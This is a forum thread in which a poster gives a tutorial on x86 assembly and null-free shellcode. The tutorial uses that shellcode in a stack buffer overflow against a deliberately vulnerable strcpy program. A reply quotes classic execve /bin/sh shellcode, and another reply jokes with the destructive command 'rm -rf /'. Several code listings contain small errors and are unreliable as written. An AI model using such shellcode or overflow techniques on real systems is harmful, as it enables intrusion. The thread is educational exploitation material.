![]() |
|
|||||||
| Hacking and Phreaking From hacking a website to a new virus or getting free calls on a phone. It goes here. |
![]() |
|
|
Thread Tools | Display Modes |
|
#1
|
|||
|
|||
|
Here's a tutorial that I put together to try and encourage people to start into assembly and exploitation.. If there are any errors, please post here and I'll edit them ASAP.
The path to shellcode ===================== In this tutorial, I will teach you the basics of assembly needed to build your own shellcode. Assembly is quite a misunderstood language, and people always believe that its harder than it actually is! Heres a little overview of what assembly really does though: Assembly is programing a machine in the lowest level (No compiilers, etc) possible without going into the 0's and 1's. It's all about thinking about how you arrange your memory, etc. It's quite easy to do really. The object of the tutorial will be to exploit the following program. Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
char buffer[5]
if(argc<2){
printf("Usage: %s <text>\n",%s);
exit(0);
}
strcpy(buffer,argv[1]);
printf("%s\n",buffer);
return 0;
}
$ gcc -g bug.c bug $ ./bug Bob. Bob. $ This will compile and test the program. The part that makes is program exploitable is the strcpy() function. It does not check the arguments to see if their lengths are appropriate. In this tutorial, we will be making use of this fact, and will be building a big string in the argv[1], and it will be copied into the tiny (5 bytes) character array. In this tutorial we will be covering the intel assembly syntax, and using nasm. There are different types, eg AT&T, and all can be used for shellcode, but what you choose to learn is all down to taste. The basic syntax for an assembly instruction is the following: Code:
instruction argument(, argument) Code:
mov - Takes who arguments. The second is the source, the first is the destination. It moves the memory address of the second into the first, essentially copying the data. inc - This just takes one. It takes the arguments value (or address, etc) and increases its value by one. It stores the result in the source address. dec - This is the same as inc, but decreases the arguments value. push - This is a stack function. There is only one argument, the source. It is used to 'push' the sources data onto the stack. pop - This is another stack function, and is used to 'pop' something off the stack into the location of the first (only) argument. call - This will call a funcion, jumping the execution to the address supplied as an argument. ret - To return from a function. It pops the return address from the stack, and jumps execution to there. xor - This takes two arguments. It is used to preform a bitwise exclusing 'or', comparing each operand. int - This will be the instruction that puts all of this together. It stands for interrupt. It takes one argument, and that is the interrupt number that will call different parts of the system. In this example, we will be using 'int 80h', as it is the interrupt that calls the kernel to execute our code. Here is an example demonstrating the syntax of assembly. example.s Code:
mov eax,4 ; move '4' into eax. inc eax ; increase eax by one, i.e., to 5. call randomFunction ; call the function random function. push eax ; push eax's value onto the stack. pop edx ; pop the value off the top of the stack into EDX. xor eax,edx ; xor the values of eax and edx. This will return 0, as both values are the same. Now, it's time to take our second step into learning assembly, and write a program. Hello World! This program, being our first, will follow a traditional pattern, it's going to do nothing but print "Hello, world!". So, how do we go about doing this? Well, in the linux kernel, there is an array of system calls that correspond to functions. We need to copy the appropriate number for a call to write to STDOUT (standard output, i.e., your console window). The next question is where? In assembly, there are a number of registers that need to be filled in in order for a program to run. The first four are EAX, EBX, ECX, and EDX. These are called the accumulator, base, counter, and data registers. They are used for a wide range of things, but mainly they are temporary variables that are used when executing machine instructions. The next four are ESP, EBP, ESI, and EDI. They are also general purpose registers, but are sometimes called pointers and indexes. They are the Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively. The first two are reffered to as pointers because they contain 32-bit memory addresses, pointing to a location in the memory. The last two are also technically pointers, that are used to point to the source and destination when data needs to be read from or written to. The last is the EIP register, which points to the current instruction the CPU is executing. It is akin to a child pointing at a word as it reads. In this tutorial, we will only need EAX, EBX, ECX, and EDX, but it can be helpful in assembly to understand the others. The EAX register holds the integer value for the system call we want to use. The rest will hold the arguments. Now, just before we write our program, we need to look at segments in memory. The ones we will be using in the following example are .data and the .text. The .data segment stores the variables, and .text holds the machine code. And now, some machine code! hello.s Code:
section .data ; Note, we called the .data segment for variables. msg db "Hello, world!", 0ah ; This writes our string and a new line character into 'msg'. section .text ; now in the text segment. global _start ; this is the default entry point for ELF linking and tells the CPU where to begin executing from. _start: ; have a function called start. This is because of the linking; the linker needs to know where to begin. ; SYSCALL 4: write(int fd, const void *buffer, size_t count); mov eax,4 ; the 4th syscall is for write. This is what we will use to write to the STDOUT file descriptor. mov ebx,1 ; put 1 into EBX. This is the file descriptor for STOUT. mov ecx,msg ; put 'msg' into ecx. mov edx,14 ; put the length of the string and newline char into edx. int 80h ; call the kernel to run the above! ; SYSCALL 1: exit(0) mov eax,1 ; put exit's syscall number into eax. mov ebx,0 ; return 0 upon exit. int 80h twitch@home:~ $ nasm -f elf hello.s twitch@home:~ $ ld hello.o twitch@home:~ $ ./a.out Hello, world! twitch$home:~ $ So, our program worked. I'd recommend taking out all the comments from the above code and looking at it then, it's a lot cleaner. Unfortunately, our code will not work as shellcode however. The problems are as follows: - Shellcode itself is inside a .text segments, so we cannot be moving within the shellcode. - We also cannot have null bytes! To check for null bytes, we assembly the program in a different way. ========== twitch@home:~ $ nasm hello.s twitch@home:~ $ hexdump -C hello | grep --color=auto 00 [ OUTPUT TRIMMED ] ========== This will show us a lot of null bytes within the code. We will have to remove these, but lets rewrite our code in a shellcode-suitable form. hello2.s Code:
BITS 32 call mark_below db "Hello, World!",0x0a,0x0d mark_below: ; ssize_t write(int fd, const void *buf, size_t count); pop ecx ;pop the return address (the string pointer) into ecx mov eax,4 ; 4 is the syscall for write. mov ebx,1 ; STDOUT mov edx,15 ; length of string int 80h ; do the system call ; void _exit(int status) mov eax,1 ; 1 is exits system call mov ebx,0 ; return 0; int 80h ; do the system call $ nasm hello2.s $ hexdump -C hello2 | grep --color=auto 00 There are still plenty of null bytes in our code, and it can be tested out but it will not work as shellcode. In the output from hexdump, you will see 6 00's near the start. This (using gdb) can be shown to be our call function.. We need to sort that out. Here is our modified code. hello3.s Code:
BITS 32 jmp short one ; call the 'one' function, which will call next. two: ; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; pop the string pointer from the stack mov al,4 ; put 4 into AL xor ebx,ebx ; XORing ebx with itself will return 0. inc ebx ; increase ebx by one xor edx,edx ; XOR out edx mov dl,15 ; put 16 into edx int 80h ; call the kernel mov al,1 ; put 1 into AL for exit dec ebx ; decrease ebx to 0 (return code) int 80h ; call the kernel. one: call two db "Hello, world!", 0x0a, 0x0d,0x00 sure: $ nasm hello3.s $ hexdump -C hello3 | grep --color=auto 00 Look! No NULL bytes! Excellent, this will do very nicely. But, why did it work? Our shellcode now is quite different from before, but it should be readable to you. It encorperates most of the instructions in the initial example! The only thing that ought to be confusing you is the 'mov al,4' line. What is AL? Well, years back, computers used to only have 16-bit registers. That meant, there was AX as the whole accumulator register, with AL as the lower 8 bytes, and AH as the higher 8 bytes. Now, with 32-bit processors, we have EAX. We can use the AX register nowadays if we choose. The REASON for using it, is because the AL register can hold the integer '4', so we use that to avoid the null bytes that are brought in when we use EAX. Now, it's time to exploit our program! Running the exploit Now that we have our shellcode sorted out, we need to find somewhere to hold it. To make use of a good trick, we will use environment variables. These are useful when the buffer we are overflowing is small. We can overflow the buffer with the address of the environment variable with the shellcode in it. Here is a program that will tell us the location of an environment variable in memory: getenvaddr.c Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]){
char *ptr;
if(argc < 3){
printf("Usage: %s <environment variable> <target program>\n",argv[0]);
exit(0);
}
ptr = getenv(argv[1]);
ptr += (strlen(argv[0]) - strlen(strlen(argv[2]))*2;
printf("%s will be at %p\n",argv[1],ptr);
}
the memory address out a few times. $ nasm hello3.s $ export SHELLCODE=`cat hello3` $ ./getenvaddr SHELLCODE ./bug SHELLCODE will be at 0xbfffff0c $ ./bug `perl -e 'print "\x0c\xff\xff\xbf"x100;'` Hello, World! $
__________________
Twitch` |
|
#2
|
||||
|
||||
|
Very good! Could you define shell code as I always thought of it as #!/bin/bash
rm -rf / Or some such thing! |
|
#3
|
|||
|
|||
|
Yeah no bother!
It's basically hex code that isn't dependent on file/process in the OS. It's code that will run without including other files,etc. Typically its use is in the exploitation of programs. It got the name because usually when exploiting a vulnerability, the purpose of the code would be to spawn a shell, so "shellcode" followed as a name. Here's an example from AlephOne's "smashing the stack for fun and profit". char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\ x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\ x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; When you compile the C or assembly shellcode, it's being written into a hex format that the machine will understand. For example, (1) mov eax,4 will be compiled into "b8 04 00 00 00" (2) mov al,4 will be compiled into "b0 04" But when you're injecting the code, it'll presume it's just plain ASCII, so you need the \x prefix to tell the machine its hexadecimal. So, mov al,4 will be compiled into "b0 04" and when we write it as shellcode, it's "\xb0\x04".
__________________
Twitch` |
![]() |
| Bookmarks |
| Tags |
| assembly , exploitation , hacking , programming , tutorial |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Tutorial | Cannons and Weapons | 19 | 11-07-2007 07:50 PM | |
| Brilliant C tutorial | Jamkirk | Websites and Files | 4 | 22-01-2007 06:30 PM |
| My tutorial (proofread please) | 4 | Hacking and Phreaking | 2 | 20-06-2005 03:43 PM |
| A little tutorial on key generators | General Disscusion | 0 | 30-12-2004 08:00 PM | |
| raZZia's Tutorial on Key Generators | General Disscusion | 0 | 30-12-2004 12:57 AM | |